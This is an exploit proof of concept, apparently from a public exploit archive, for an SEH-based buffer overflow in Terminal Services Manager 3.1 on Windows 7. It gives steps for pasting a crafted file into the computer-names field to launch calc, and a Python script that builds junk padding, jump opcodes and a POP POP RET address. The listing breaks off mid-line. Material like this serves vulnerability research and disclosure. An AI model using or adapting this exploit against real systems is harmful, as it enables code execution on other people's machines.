# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH) # Date: 2018-12-25 # Exploit Author: bzyo # Twitter: @bzyo_ # Vulnerable Software: Terminal Services Manager 3.1 # Vendor Homepage: https://lizardsystems.com # Version: 3.1 # Software Link: https://lizardsystems.com/download/tsmanager_setup.exe # Tested Windows 7 SP1 x86 # Other affected software from the vendor # Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe # Software Link: https://lizardsystems.com/download/rshutdown_setup.exe # Software Link: https://lizardsystems.com/download/rdaudit_setup.exe # PoC # 1. run script # 2. run add computers wizard # 3. select import from files # 4. paste tsmang.txt into computer names field # 5. pop calc #bad chars \x00\x0d\x0e #!/usr/bin/python import struct junk2 = "A"*100 junk1 = "B"*74 jmp2 = "\xe9\x71\xfe\xff\xff\xcc" jmp1 = "\xeb\xf8\xcc\xcc" #0x0049709f : pop esi # pop ebx # ret tsmanager.exe seh = struct.pack('